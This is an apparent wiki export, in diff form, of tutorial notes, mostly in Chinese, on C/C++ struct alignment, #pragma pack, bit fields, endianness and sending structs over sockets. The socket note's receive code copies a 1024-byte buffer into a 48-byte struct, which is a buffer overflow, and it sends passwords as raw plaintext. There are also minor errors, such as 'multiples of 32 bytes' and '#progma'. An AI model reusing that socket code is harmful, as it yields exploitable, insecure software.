|
||||
|
||||
15. int main(int argc, char* argv[])
|
||||
16. {
|
||||
17. example2 struct2;
|
||||
18. cout << sizeof(example1) << endl;
|
||||
19. cout << sizeof(example2) << endl;
|
||||
20. cout << (unsigned int)(&struct2.struct1) – (unsigned int)(&struct2)<< endl;
|
||||
21. return 0;
|
||||
22. }
|
||||
|
||||
问程序的输出结果是什么?
|
||||
|
||||
答案是:
|
||||
|
||||
8
|
||||
16
|
||||
4
|
||||
|
||||
不明白?还是不明白?下面一一道来:
|
||||
|
||||
===== 2.1 自然对界 =====
|
||||
|
||||
struct是一种复合数据类型,其构成元素既可以是基本数据类型(如int、long、float等)的变量,也可以是一些复合数据类型(如array、struct、union等)的数据单元。**对于结构体,编译器会自动进行成员变量的对齐**,以提高运算效率。缺省情况下,编译器为结构体的每个成员按其**自然对界(natural alignment)**条件分配空间。各个成员按照它们被声明的顺序在内存中顺序存储,第一个成员的地址和整个结构的地址相同。
|
||||
|
||||
自然对界(natural alignment)即默认对齐方式,是指**按结构体的成员中size最大的成员对齐**。
|
||||
例如:
|
||||
|
||||
struct naturalalign
|
||||
|
||||
{
|
||||
char a;
|
||||
short b;
|
||||
char c;
|
||||
};
|
||||
|
||||
在上述结构体中,size最大的是short,其长度为2字节,因而结构体中的char成员a、c都以2为单位对齐,sizeof(naturalalign)的结果等于6;
|
||||
|
||||
如果改为:
|
||||
|
||||
struct naturalalign
|
||||
|
||||
{
|
||||
char a;
|
||||
int b;
|
||||
char c;
|
||||
};
|
||||
|
||||
其结果显然为12。
|
||||
|
||||
===== 2.2指定对界 =====
|
||||
|
||||
一般地,可以通过下面的方法来改变缺省的对界条件:
|
||||
|
||||
· 使用伪指令#pragma pack (n),编译器将按照n个字节对齐;
|
||||
· 使用伪指令#pragma pack (),取消自定义字节对齐方式。
|
||||
|
||||
注意:如果#pragma pack (n)中指定的n大于结构体中最大成员的size,则其不起作用,结构体仍然按照size最大的成员进行对界。
|
||||
|
||||
例如:
|
||||
#pragma pack (n)
|
||||
struct naturalalign
|
||||
{
|
||||
char a;
|
||||
int b;
|
||||
char c;
|
||||
};
|
||||
#pragma pack ()
|
||||
|
||||
当n为4、8、16时,其对齐方式均一样,sizeof(naturalalign)的结果都等于12。而当n为2时,其发挥了作用,使得sizeof(naturalalign)的结果为8。
|
||||
|
||||
在VC++ 6.0编译器中,我们可以指定其对界方式(见图1),其操作方式为依次选择projetct > setting > C/C++菜单,在struct member alignment中指定你要的对界方式。
|
||||
图1 在VC++ 6.0中指定对界方式
|
||||
|
||||
另外,通过____attribute((aligned (n)))__也可以让所作用的结构体成员对齐在n字节边界上,但是它较少被使用,因而不作详细讲解。
|
||||
|
||||
===== 2.3 面试题的解答 =====
|
||||
|
||||
至此,我们可以对Intel、微软的面试题进行全面的解答。
|
||||
程序中第2行#pragma pack (8)虽然指定了对界为8,但是由于struct example1中的成员最大size为4(long变量size为4),故struct example1仍然按4字节对界,struct example1的size为8,即第18行的输出结果;
|
||||
|
||||
struct example2中包含了struct example1,其本身包含的简单数据成员的最大size为2(short变量e),但是因为其包含了struct example1,而struct example1中的最大成员size为4,struct example2也应以4对界,#pragma pack (8)中指定的对界对struct example2也不起作用,故19行的输出结果为16;
|
||||
|
||||
由于struct example2中的成员以4为单位对界,故其char变量c后应__补充3个空__,其后才是成员struct1的内存空间,20行的输出结果为4。
|
||||
|
||||
===== 3. C和C++间struct的深层区别 =====
|
||||
|
||||
在C++语言中struct具有了“类”的功能,其与关键字class的区别在于struct中成员变量和函数的默认访问权限为public,而class的为private。
|
||||
|
||||
例如,定义struct类和class类:
|
||||
|
||||
struct structA
|
||||
{
|
||||
char a;
|
||||
…
|
||||
}
|
||||
|
||||
class classB
|
||||
{
|
||||
char a;
|
||||
…
|
||||
}
|
||||
|
||||
则:
|
||||
|
||||
struct A a;
|
||||
a.a = ‘a’; //访问public成员,合法
|
||||
|
||||
classB b;
|
||||
b.a = ‘a’; //访问private成员,不合法
|
||||
|
||||
许多文献写到这里就认为已经给出了C++中struct和class的全部区别,实则不然,另外一点需要注意的是:
|
||||
__C++中的struct保持了对C中struct的全面兼容__(这符合C++的初衷——“a better c”),因而,下面的操作是合法的:
|
||||
|
||||
//定义struct
|
||||
struct structA
|
||||
{
|
||||
char a;
|
||||
char b;
|
||||
int c;
|
||||
};
|
||||
structA a = {‘a’ , ‘a’ ,1}; // 定义时直接赋初值
|
||||
即struct可以在定义的时候直接以{ }对其成员变量赋初值,而class则不能,在经典书目《thinking C++ 2nd edition》中作者对此点进行了强调。
|
||||
|
||||
===== 4.struct编程注意事项 =====
|
||||
|
||||
看看下面的程序:
|
||||
|
||||
1. #include <iostream.h>
|
||||
2. struct structA
|
||||
3. {
|
||||
4. int iMember;
|
||||
5. char *cMember;
|
||||
6. };
|
||||
|
||||
7. int main(int argc, char* argv[])
|
||||
8. {
|
||||
9. structA instant1,instant2;
|
||||
10. char c = ‘a’;
|
||||
11. instant1.iMember = 1;
|
||||
12. instant1.cMember = &c;
|
||||
13. instant2 = instant1;
|
||||
14. cout << *(instant1.cMember) << endl;
|
||||
15. *(instant2.cMember) = ‘b’;
|
||||
16. cout << *(instant1.cMember) << endl;
|
||||
17. return 0;
|
||||
}
|
||||
|
||||
14行的输出结果是:a
|
||||
16行的输出结果是:b
|
||||
|
||||
Why?我们在15行对instant2的修改改变了instant1中成员的值!
|
||||
|
||||
原因在于13行的__instant2 = instant1赋值语句采用的是变量逐个拷贝__,这使得instant1和instant2中的cMember指向了同一片内存,因而对instant2的修改也是对instant1的修改。
|
||||
|
||||
在C语言中,当结构体中存在指针型成员时,一定要注意在采用赋值语句时是否将2个实例中的指针型成员指向了同一片内存。
|
||||
|
||||
在C++语言中,当结构体中存在指针型成员时,我们需要重写struct的拷贝构造函数并进行“=”操作符重载。
|
||||
|
||||
|
||||
没有 说到:
|
||||
2006年06月16日 @ 3:49 pm
|
||||
|
||||
好像还与结构体成员的排列顺序有关吧,比如:
|
||||
|
||||
struct naturalalign
|
||||
{
|
||||
char a;
|
||||
int b;
|
||||
char c;
|
||||
};
|
||||
|
||||
结构体的大小和:
|
||||
|
||||
struct naturalalign
|
||||
{
|
||||
char a;
|
||||
char c;
|
||||
int b;
|
||||
};
|
||||
|
||||
的大小就不一样。
|
||||
|
||||
yoghurt 说到:
|
||||
2006年09月29日 @ 2:12 pm
|
||||
|
||||
对struct的类似使用有所保留,
|
||||
不同的编译器, 在不同的平台上, 相同定义struct的成员
|
||||
的对齐和内部排列顺序都可能不同.
|
||||
特别是当打开一些优化选项的时候.
|
||||
所以上面的程序, 如果在接受方可能会产生错误.
|
||||
宋宝华 说到:
|
||||
2006年10月24日 @ 11:13 pm
|
||||
|
||||
各位的意见都很对,本文讲解struct的封装作用,所以没有特别提及struct的对界。笔者在另外一篇文章里专门论述了struct的对界问题。
|
||||
@@ -0,0 +1,99 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T14:44:52+08:00
|
||||
|
||||
====== CC++结构体的一个高级特性――指定成员的位数 ======
|
||||
Created 星期六 04 六月 2011
|
||||
|
||||
宋宝华 21cnbao@21cn.com sweek
|
||||
在大多数情况下,我们一般这样定义结构体:
|
||||
struct student
|
||||
{
|
||||
unsigned int sex;
|
||||
unsigned int age;
|
||||
};
|
||||
对于一般的应用,这已经能很充分地实现数据了的“封装”。
|
||||
但是,在实际工程中,往往碰到这样的情况:那就是要用一个**基本类型变量中的不同的位表示不同的含义**。譬如一个cpu内部的标志寄存器,假设为16 bit,而每个bit都可以表达不同的含义,有的表示结果是否为0,有的表示是否越界等等。这个时候我们用什么数据结构来表达这个寄存器呢?
|
||||
答案还是结构体!
|
||||
|
||||
为达到此目的,我们要用到结构体的高级特性,那就是在基本成员变量的后面添加:
|
||||
: 数据位数
|
||||
组成新的结构体:
|
||||
|
||||
struct xxx
|
||||
{
|
||||
成员1类型 成员1 : 成员1位数;
|
||||
成员2类型 成员2 : 成员2位数;
|
||||
成员3类型 成员3 : 成员3位数;
|
||||
};
|
||||
基本的成员变量就会被拆分!这个语法在初级编程中很少用到,但是在高级程序设计中不断地被用到!
|
||||
例如:
|
||||
struct student
|
||||
{
|
||||
unsigned int sex : 1;
|
||||
unsigned int age : 15;
|
||||
};
|
||||
上述结构体中的两个成员sex和age加起来只占用了一个unsigned int的空间(假设unsigned int为16位)。
|
||||
|
||||
基本成员变量被拆分后,访问的方法仍然和访问没有拆分的情况是一样的,例如:
|
||||
struct student sweek;
|
||||
sweek.sex = MALE;
|
||||
sweek.age = 20;
|
||||
|
||||
虽然拆分基本成员变量在语法上是得到支持的,但是并不等于我们想怎么分就怎么分,例如下面的拆分显然是不合理的:
|
||||
struct student
|
||||
{
|
||||
unsigned int sex : 1;
|
||||
unsigned int age : 12;
|
||||
};
|
||||
这是因为1+12 = 13,不能再组合成一个基本成员,__不能组合成char、int或任何类型__,这显然是不能“自圆其说”的。
|
||||
|
||||
在拆分基本成员变量的情况下,我们要特别注意数据的存放顺序,这还与CPU是Big endian还是Little endian来决定。Little endian和Big endian是CPU存放数据的两种不同顺序。对于整型、长整型等数据类型,Big endian认为第一个字节是最高位字节(按照从低地址到高地址的顺序存放数据的高位字节到低位字节);而Little endian则相反,它认为第一个字节是最低位字节(按照从低地址到高地址的顺序存放数据的低位字节到高位字节)。
|
||||
|
||||
我们定义IP包头结构体为:
|
||||
struct iphdr {
|
||||
#if defined(__LITTLE_ENDIAN_BITFIELD)
|
||||
__u8 ihl:4,
|
||||
version:4;
|
||||
#elif defined (__BIG_ENDIAN_BITFIELD)
|
||||
__u8 version:4,
|
||||
ihl:4;
|
||||
#else
|
||||
#error "Please fix <asm/byteorder.h>"
|
||||
#endif
|
||||
__u8 tos;
|
||||
__u16 tot_len;
|
||||
__u16 id;
|
||||
__u16 frag_off;
|
||||
__u8 ttl;
|
||||
__u8 protocol;
|
||||
__u16 check;
|
||||
__u32 saddr;
|
||||
__u32 daddr;
|
||||
/*The options start here. */
|
||||
};
|
||||
在Little endian模式下,iphdr中定义:
|
||||
__u8 ihl:4,
|
||||
version:4;
|
||||
其存放方式为:
|
||||
第1字节低4位 ihl
|
||||
第1字节高4位 version (IP的版本号)
|
||||
|
||||
若在Big endian模式下还这样定义,则存放方式为:
|
||||
第1字节低4位 version (IP的版本号)
|
||||
第1字节高4位 ihl
|
||||
这与实际的IP协议是不匹配的,所以在Linux内核源代码中,IP包头结构体的定义利用了宏:
|
||||
#if defined(____LITTLE_ENDIAN_BITFIELD__)
|
||||
…
|
||||
#elif defined (__BIG_ENDIAN_BITFIELD)
|
||||
…
|
||||
#endif
|
||||
来区分两种不同的情况。
|
||||
|
||||
|
||||
由此我们总结全文的主要观点:
|
||||
(1) C/C++语言的结构体支持对其中的基本成员变量按位拆分;
|
||||
(2) 拆分的位数应该是合乎逻辑的,应仍然可以组合为基本成员变量;
|
||||
|
||||
要特别注意拆分后的数据的存放顺序,这一点要结合具体的CPU的结构。
|
||||
|
||||
88
Zim/Programme/APUE/C&C+语言struct深层探索/C语言:内存字节对齐详解.txt
Normal file
@@ -0,0 +1,88 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T13:29:51+08:00
|
||||
|
||||
====== C语言:内存字节对齐详解 ======
|
||||
Created 星期日 05 六月 2011
|
||||
地址:http://hi.baidu.com/jjpro/blog/item/06ea380859eac433e82488f8.html
|
||||
|
||||
|
||||
|
||||
===== 一、什么是对齐,以及为什么要对齐: =====
|
||||
|
||||
1. 现代计算机中内存空间都是按照byte划分的,从理论上讲似乎对任何类型的变量的访问可以从任何地址开始,但实际情况是在访问特定变量的时候经常在__特定的内存地址__访问,这就需要各类型数据按照一定的规则在空间上排列,而不是顺序的一个紧接一个的没有空隙的排放,这就是对齐。
|
||||
|
||||
2. 对齐的作用和原因:各个硬件平台对存储空间的处理上有很大的不同。一些平台对某些特定类型的数据只能从某些特定地址开始存取。其他平台可能没有这种情况, 但是最常见的是如果不按照适合其平台的要求对数据存放进行对齐,会在__存取效率上带来损失__。比如有些平台每次读都是从偶地址开始,如果一个int型(假设为 32位)如果存放在偶地址开始的地方,那么一个读周期就可以读出,而如果存放在奇地址开始的地方,就可能会需要2个读周期,并对两次读出的结果的高低 字节进行拼凑才能得到该int数据。显然在读取效率上下降很多。这也是空间和时间的博弈。
|
||||
|
||||
===== 二、对齐的实现 =====
|
||||
|
||||
通常,我们写程序的时候,不需要考虑对齐问题。编译器会替我们选择适合目标平台的对齐策略。当然,我们也可以通知给编译器传递预编译指令而改变对指定数据的对齐方法。
|
||||
但是,正因为我们一般不需要关心这个问题,所以因为编辑器对数据存放做了对齐,而我们不了解的话,常常会对一些问题感到迷惑。最常见的就是struct数据结构的__sizeof__结果,出乎意料。为此,我们需要对对齐算法所了解。
|
||||
|
||||
==== 对齐的算法: ====
|
||||
由于各个平台和编译器的不同,现以本人使用的gcc version 3.2.2编译器(32位x86平台)为例子,来讨论编译器对struct数据结构中的各成员如何进行对齐的。
|
||||
设结构体如下定义:
|
||||
struct A {
|
||||
int a;
|
||||
char b;
|
||||
short c;
|
||||
};
|
||||
结构体A中包含了4字节长度的int一个,1字节长度的char一个和2字节长度的short型数据一个。所以A用到的空间应该是7字节。但是因为编译器要对数据成员在空间上进行对齐。所以使用sizeof(strcut A)值为__8__。
|
||||
|
||||
现在把该结构体调整成员变量的顺序。
|
||||
struct B {
|
||||
char b;
|
||||
int a;
|
||||
short c;
|
||||
};
|
||||
这时候同样是总共7个字节的变量,但是sizeof(struct B)的值却是__12__。
|
||||
|
||||
下面我们使用预编译指令#pragma pack (value)来告诉编译器,使用我们指定的对齐值来取代缺省的。
|
||||
#progma pack (2) /*指定按2字节对齐*/
|
||||
struct C {
|
||||
char b;
|
||||
int a;
|
||||
short c;
|
||||
};
|
||||
#progma pack () /*取消指定对齐,恢复缺省对齐*/
|
||||
sizeof(struct C)值是8。
|
||||
|
||||
修改对齐值为1:
|
||||
#progma pack (__1__) /*指定按1字节对齐*/
|
||||
struct D {
|
||||
char b;
|
||||
int a;
|
||||
short c;
|
||||
};
|
||||
#progma pack () /*取消指定对齐,恢复缺省对齐*/
|
||||
sizeof(struct D)值为7。
|
||||
|
||||
对于char型数据,其自身对齐值为1,对于short型为2,对于int,float,double类型,其自身对齐值为4,单位字节。
|
||||
这里面有__四个概念值__:
|
||||
1)数据类型自身的对齐值:就是上面交代的基本数据类型的自身对齐值。
|
||||
2)指定对齐值:#pragma pack (value)时的指定对齐值value。
|
||||
3)结构体或者类的自身对齐值:其成员中自身对齐值最大的那个值。
|
||||
4)数据成员、结构体和类的__有效对齐值__:自身对齐值和指定对齐值中较小的那个值。
|
||||
|
||||
有了这些值,我们就可以很方便的来讨论具体数据结构的成员和其自身的对齐方式。有效对齐值N是最终用来决定数据存放地址方式的值,最重要。有效对齐N,就是表示“对齐在N上”,也就是说该数据的"__存放起始地址%N=0__".而数据结构中的数据变量都是按**定义的先后顺序来排放**的。第一个数据变量的起始地址就是**数据结构的起始地址**。结构体的成员变量要对齐排放,**结构体本身**也要根据自身的有效对齐值圆整(就是结构体成员变量占用总长度需要是对结构体有效对齐值的整数倍,结合下面例子理解)。这样就不难理解上面的几个例子的值了。
|
||||
例子分析:
|
||||
分析例子B;
|
||||
struct B {
|
||||
char b;
|
||||
int a;
|
||||
short c;
|
||||
};
|
||||
假设B从地址空间0x0000开始排放。该例子中没有定义指定对齐值,在笔者环境下,该值**默认为4**。第一个成员变量b的自身对齐值是1,比指定或者默认指定对齐值4小,所以其有效对齐值为1,所以其存放地址0x0000符合0x0000%1=0.第二个成员变量a,其自身对齐值为4,所以有效对齐值也为 4,所以只能存放在起始地址为0x0004到0x0007这四个连续的字节空间中,复核0x0004%4=0,且紧靠第一个变量。第三个变量c,自身对齐 值为2,所以有效对齐值也是2,可以存放在0x0008到0x0009这两个字节空间中,符合0x0008%2=0。所以从0x0000到0x0009存 放的都是B内容。再看数据结构B的自身对齐值为其变量中最大对齐值(这里是b)所以就是4,所以**结构体的有效对齐值也是4**。根据结构体圆整的要求, 0x0009到0x0000=10字节,(10+2)%4=0。所以0x0000A到0x000B也为结构体B所占用。故B从0x0000到0x000B 共有12个字节,sizeof(struct B)=12;
|
||||
|
||||
同理,分析上面例子C:
|
||||
#pragma pack (2) /*指定按2字节对齐*/
|
||||
struct C {
|
||||
char b;
|
||||
int a;
|
||||
short c;
|
||||
};
|
||||
#pragma pack () /*取消指定对齐,恢复缺省对齐*/
|
||||
第一个变量b的自身对齐值为1,指定对齐值为2,所以,其有效对齐值为1,假设C从0x0000开始,那么b存放在0x0000,符合0x0000%1= 0;第二个变量,自身对齐值为4,指定对齐值为2,所以有效对齐值为2,所以顺序存放在0x0002、0x0003、0x0004、0x0005四个连续 字节中,符合0x0002%2=0。第三个变量c的自身对齐值为2,所以有效对齐值为2,顺序存放
|
||||
在0x0006、0x0007中,符合0x0006%2=0。所以从0x0000到0x00007共八字节存放的是C的变量。又C的自身对齐值为4,所以 C的有效对齐值为2。又8%2=0,C只占用0x0000到0x0007的八个字节。所以sizeof(struct C)=8.
|
||||
|
||||
有了以上的解释,相信你对C语言的字节对齐概念应该有了清楚的认识了吧。在网络程序中,掌握这个概念可是很重要的喔,在不同平台之间(比如在Windows 和Linux之间)传递2进制流(比如结构体),__那么在这两个平台间必须要定义相同的对齐方式__,不然莫名其妙的出了一些错,可是很难排查的哦^_^。
|
||||
57
Zim/Programme/APUE/C&C+语言struct深层探索/Struct_packing.txt
Normal file
@@ -0,0 +1,57 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T16:09:55+08:00
|
||||
|
||||
====== Struct packing ======
|
||||
Created 星期日 05 六月 2011
|
||||
http://tedlogan.com/techblog2.html
|
||||
|
||||
Last week, I was debugging some code and came across a troubling situation: A variable that I set in one function was suddenly and quickly being mutilated before I managed to read it in another function. After hours at the debugger, I discovered the culprit was struct packing.
|
||||
|
||||
To understand what struct packing means, let's start with an arbitrary C struct:
|
||||
struct example_struct {
|
||||
char my_char;
|
||||
short my_short;
|
||||
int my_int;
|
||||
};
|
||||
|
||||
Let's play compiler and try to lay out this structure in memory. Assume that char is one byte, short is two bytes, and int is four bytes, and that we can ignore byte ordering. Our first attempt will be to use as little memory as possible:
|
||||
|
||||
Address 0 1 2 3 4 5 6
|
||||
Data my_char my_short my_int
|
||||
|
||||
That's it; our struct takes 7 bytes in memory. That's great, right?
|
||||
|
||||
Well, not really. Modern 32-bit computers like to access data in 32-bit chunks, and more importantly, they like the data to be aligned in multiples of 32 bytes. (You may correctly extrapolate that 64-bit systems like to access data in 64-bit chunks and like these chunks to be aligned in multiples of 64 bits.) What this means is that the structure we laid out above will probably be less efficient to access than it could be. So let's make another attempt:
|
||||
|
||||
Address 0 1 2 3 4 5 6 7 8 9 10 11
|
||||
Data my_char my_short my_int
|
||||
|
||||
Wait! Isn't that horribly wasteful of memory? We use twelve bytes to store seven bytes of data. Well, yes, but that's not important. Here's a secret:
|
||||
|
||||
Modern computers have gobs and gobs of main memory.
|
||||
|
||||
You may not be aware that "gobs" is the technical term for "gigabytes upon gigabytes". The point is that, unless you're writing code for an embedded system or for One Laptop per Child, you're not going to run out of memory by "wasting" space inside your structs.
|
||||
|
||||
Ok, so now you're asking what the point is. After all, we went off on this tangent because of a real-world problem. Take a look at the two ways we came up to arrange the structures, and imagine what happens if some code tried to use the first arrangement to read the struct while the code that wrote the structure used the second arrangement. Chaos would ensue -- the second and third elements in the struct have different addresses, so the code will read bogus values. That was the problem I saw. But what caused it, and how could I fix it?
|
||||
|
||||
It turns out that compilers allow their users to manipulate struct packing, which may come in handy if you're trying to ensure that two pieces of code compiled at different times agree on the structure packing. The two compilers I've used in the past year, gcc and Microsoft Visual C++, support the same notation, where N is a small power of two which specifies the new alignment in bytes:
|
||||
|
||||
#pragma pack(N) simply sets the new alignment.
|
||||
#pragma pack() sets the alignment to the one that was in effect when compilation started.
|
||||
#pragma pack(push[,N]) pushes the current alignment setting on an internal stack and then optionally sets the new alignment.
|
||||
#pragma pack(pop) restores the alignment setting to the one saved at the top of the internal stack (and removes that stack entry).
|
||||
|
||||
(Text from the GCC manual.)
|
||||
|
||||
GCC will generate code using the first structure packing above if one includes the following line in the code before the structure is declared:
|
||||
#pragma pack(1)
|
||||
|
||||
GCC will use the second struct packing if the following pragma is used:
|
||||
#pragma pack(4)
|
||||
|
||||
In my situation, the problem was that a header file felt the need to change the struct packing without changing it at the end of the header, and not all of my source files were including the offending header. I filed a bug report and protected myself from the header with this code:
|
||||
#pragma pack(push)
|
||||
#include "evil-header.h"
|
||||
#pragma pack(pop)
|
||||
|
||||
51
Zim/Programme/APUE/C&C+语言struct深层探索/cc++通过socket发送结构体.txt
Normal file
@@ -0,0 +1,51 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T14:55:37+08:00
|
||||
|
||||
====== cc++通过socket发送结构体 ======
|
||||
Created 星期日 05 六月 2011
|
||||
|
||||
c/c++通过socket发送结构可以直接先将结构转化到内存中,再通过send直接发送。
|
||||
|
||||
在网络通讯过程中往往涉及一些有关联的参数传递,例如数组,结构体之类的。对于结构体其实方法挺简单,由于结构体对象在内存中分配的空间都是连续的,所以可以将整个结构体直接转化成字符串发送,到了接收方再将这个字符串还原成结构体就大功告成了。
|
||||
|
||||
首先,我们建立一个结构体。
|
||||
|
||||
struct UsrData{
|
||||
|
||||
char usr_id[16];
|
||||
|
||||
char usr_pwd[16];
|
||||
|
||||
char usr_nickname[16];
|
||||
|
||||
};
|
||||
|
||||
当然,这个结构体在发送方与接收方都必须声明。
|
||||
|
||||
接下来创建对象并初始化,然后发送。
|
||||
|
||||
UsrData sendUser;
|
||||
|
||||
memcpy( sendUser.usr_id, “100001”, sizeof(“100001”) );
|
||||
|
||||
memcpy( sendUser.usr_pwd, “123456”, sizeof(“123456”) );
|
||||
|
||||
memcpy( sendUser.usr_nickname, “Rock”, sizeof(“Rock”) );
|
||||
|
||||
send( m_socket, (char *)&sendUser, sizeof(UsrData), 0 );
|
||||
|
||||
这样发送方就已经将这个mUser对象以字符串的形式发送出去了。
|
||||
|
||||
最后在接收方做接收。
|
||||
|
||||
char buffer[1024];
|
||||
|
||||
UsrData recvUser;
|
||||
|
||||
recv( m_socket, buffer, sizeof(buffer), 0 );
|
||||
|
||||
memcpy( &recvUser, buffer, sizeof(buffer) );
|
||||
|
||||
这样得到的recvUser对象里的数据与sendUser相同了。具体原因其实很简单,就是因为结构体对象的内存区域连续,同时每个成员的区块大小都分配好了,当接收完自己的区块,其实自己的数据已经接收完成。挺简单的,但还是挺有用的。
|
||||
|
||||
@@ -0,0 +1,281 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-05T13:47:20+08:00
|
||||
|
||||
====== 难以理解的《内存对齐与ANSI C中struct型数据的内存布局》 ======
|
||||
Created 星期日 05 六月 2011
|
||||
|
||||
当在C中定义了一个结构类型时,它的大小是否等于各字段(field)大小之和?编译器将如何在内存中放置这些字段?ANSI C对结构体的内存布局有什么要求?而我们的程序又能否依赖这种布局?这些问题或许对不少朋友来说还有点模糊,那么本文就试着探究它们背后的秘密。
|
||||
|
||||
首先,至少有一点可以肯定,那就是ANSI C保证结构体中各字段在内存中出现的位置是随它们的声明顺序依次递增的,并且第一个字段的首地址等于整个结构体实例的首地址。比如有这样一个结构体:
|
||||
|
||||
struct vector{int x,y,z;} s;
|
||||
int *p,*q,*r;
|
||||
struct vector *ps;
|
||||
|
||||
p = &s.x;
|
||||
q = &s.y;
|
||||
r = &s.z;
|
||||
ps =__ &s__;
|
||||
|
||||
assert(p < q);
|
||||
assert(p < r);
|
||||
assert(q < r);
|
||||
assert(__(int*)ps__ == p);
|
||||
// 上述断言一定不会失败
|
||||
|
||||
这时,有朋友可能会问:"**标准是否规定相邻字段在内存中也相邻**?"。 唔,对不起,ANSI C没有做出保证,你的程序在任何时候都不应该依赖这个假设。那这是否意味着我们永远无法勾勒出一幅更清晰更精确的结构体内存布局图?哦,当然不是。不过先让我们从这个问题中暂时抽身,关注一下另一个重要问题————内存对齐。
|
||||
|
||||
许多实际的计算机系统对**基本类型数据在内存中存放的位置有限制**,它们会要求这些数据的首地址的值是某个数k(通常它为4或8)的倍数,这就是所谓的__内存对齐__,而这个k则被称为该数据类型的__对齐模数__(alignment modulus)。当一种类型S的对齐模数与另一种类型T的对齐模数的比值是大于1的整数,我们就称类型S的对齐要求比T强(__严格__),而称T比S弱(__宽松__)。这种强制的要求一来简化了处理器与内存之间传输系统的设计,二来可以提升读取数据的速度。比如这么一种处理器,它每次读写内存的时候都从某个8倍数的地址开始,一次读出或写入8个字节的数据,假如软件能保证double类型的数据都从8倍数地址开始,那么读或写一个double类型数据就只需要一次内存操作。否则,我们就可能需要两次内存操作才能完成这个动作,因为数据或许恰好横跨在两个符合对齐要求的8字节内存块上。某些处理器在数据不满足对齐要求的情况下可能会出错,但是Intel的IA32架构的处理器则不管数据是否对齐都能正确工作。不过Intel奉劝大家,如果想提升性能,那么__所有的程序数据都应该尽可能地对齐__。
|
||||
|
||||
|
||||
Win32平台下的微软C编译器(cl.exe for 80x86)在默认情况下采用如下的对齐规则: **任何基本数据类型T的对齐模数就是T的大小**,即sizeof(T)。比如对于double类型(8字节),就要求该类型数据的地址总是8的倍数,而char类型数据(1字节)则可以从任何一个地址开始。Linux下的GCC奉行的是另外一套规则(在资料中查得,并未验证,如错误请指正):见[[../C语言:内存字节对齐详解.txt]]。
|
||||
|
||||
__可见:不同的编译器对数据的对齐方式的处理是不一致的,所以在windows上编译的程序中定义的结构体大小和内存布局和在linux的可能不一致,一种处理方法是使用编译预处理命令强制有效对齐模数相等。__
|
||||
|
||||
现在回到我们关心的struct上来。ANSI C规定__一种结构类型的大小是它所有字段的大小以及字段之间或字段尾部的填充区大小之和(尾部的填充是为最后一个成员或本结构体的对齐要求而添加的)__。嗯?填充区?对,这就是为了使结构体字段满足内存对齐要求而额外分配给结构体的空间。那么结构体本身有什么对齐要求吗?有的,ANSI C标准规定__结构体类型的对齐要求不能比它所有字段中要求最严格的那个宽松(也就是结构体成员中对齐模数最大的那个)__,可以更严格(但此非强制要求,VC7.1就仅仅是让它们一样严格)。我们来看一个例子(以下所有试验的环境是Intel Celeron 2.4G + WIN2000 PRO + vc7.1,内存对齐编译选项是"默认",即不指定/Zp与/pack选项):
|
||||
|
||||
typedef struct ms1
|
||||
{
|
||||
char a;
|
||||
int b;
|
||||
} MS1;
|
||||
|
||||
假设MS1按如下方式内存布局(本文所有示意图中的内存地址从左至右递增):
|
||||
_____________________________
|
||||
| | |
|
||||
| a | b |
|
||||
| | |
|
||||
+---------------------------+
|
||||
Bytes: 1 4
|
||||
|
||||
因为MS1中有最强对齐要求的是b字段(int),所以根据编译器的对齐规则以及ANSI C标准,MS1对象的首地址一定是4(int类型的对齐模数)的倍数。那么上述内存布局中的b字段能满足int类型的对齐要求吗?(在结构体本身对齐的情况下,即首地址是4的倍数)嗯,当然不能。如果你是编译器,你会如何巧妙安排来满足CPU的癖好呢?呵呵,经过1毫秒的艰苦思考,你一定得出了如下的方案:
|
||||
|
||||
_______________________________________
|
||||
| |\\\\\\\\\\\| |
|
||||
| a |\\padding\\ | b |
|
||||
| |\\\\\\\\\\\| |
|
||||
+-------------------------------------+
|
||||
Bytes: 1 3 4
|
||||
|
||||
这个方案在a与b之间多分配了3个填充(padding)字节,这样当整个struct对象首地址满足4字节的对齐要求时,b字段也一定能满足int型的4字节对齐规定。那么sizeof(MS1)显然就应该是8,而**b字段相对于结构体首地址的偏移就是4**。非常好理解,对吗?现在我们把MS1中的字段交换一下顺序:
|
||||
|
||||
typedef struct ms2
|
||||
{
|
||||
int a;
|
||||
char b;
|
||||
} MS2;
|
||||
|
||||
或许你认为MS2比MS1的情况要简单,它的布局应该就是
|
||||
|
||||
_______________________
|
||||
| | |
|
||||
| a | b |
|
||||
| | |
|
||||
+---------------------+
|
||||
Bytes: 4 1
|
||||
|
||||
因为MS2对象同样要满足4字节对齐规定,而此时a的地址与结构体的首地址相等,所以它一定也是4字节对齐。嗯,分析得有道理,可是却不全面。让我们来考虑一下定义一个**MS2类型的数组**会出现什么问题。C标准保证**,任何类型(包括自定义结构类型)的数组所占空间的大小一定等于一个单独的该类型数据的大小乘以数组元素的个数**。换句话说,__数组各元素之间不会有空隙__。按照上面的方案,一个MS2数组array的布局就是:
|
||||
|
||||
|<- array[1] ->|<- array[2] ->|<- array[3] .....
|
||||
|
||||
__________________________________________________________
|
||||
| | | | |
|
||||
| a | b | a | b |.............
|
||||
| | | | |
|
||||
+----------------------------------------------------------
|
||||
Bytes: 4 1 4 1
|
||||
|
||||
当数组首地址是4字节对齐时,array[1].a也是4字节对齐,可是array[2].a呢?array[3].a ....呢?可见这种方案**在定义结构体数组时无法让数组中所有元素的字段都满足对齐规定**,必须修改成如下形式:
|
||||
|
||||
___________________________________
|
||||
| | |\\\\\\\\\\\|
|
||||
| a | b |\\padding\\|
|
||||
| | |\\\\\\\\\\\|
|
||||
+---------------------------------+
|
||||
Bytes: 4 1 3
|
||||
|
||||
现在无论是定义一个单独的MS2变量还是MS2数组,均能保证所有元素的所有字段都满足对齐规定。那么sizeof(MS2)仍然是8,而a的偏移为0,b的偏移是4。
|
||||
|
||||
好的,现在你已经掌握了结构体内存布局的基本准则,尝试分析一个稍微复杂点的类型吧。
|
||||
|
||||
typedef struct ms3
|
||||
{
|
||||
char a;
|
||||
short b;
|
